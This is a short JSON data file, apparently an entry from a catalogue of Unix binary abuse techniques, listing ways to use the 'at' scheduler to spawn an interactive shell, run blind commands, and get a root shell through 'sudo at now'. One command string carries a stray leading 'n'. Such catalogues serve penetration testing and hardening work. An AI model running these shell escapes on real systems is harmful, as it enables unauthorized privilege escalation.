You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

21 lines
505 B
JSON

{
"functions": {
"shell": [
{
"code": "echo \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" | at now; tail -f /dev/null\n"
}
],
"command": [
{
"description": "The invocation will be blind, but it is possible to redirect the output to a file in a readable location.",
"code": "necho \"[command]\" | at now\n"
}
],
"sudo": [
{
"code": "echo \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" | sudo at now; tail -f /dev/null\n"
}
]
}
}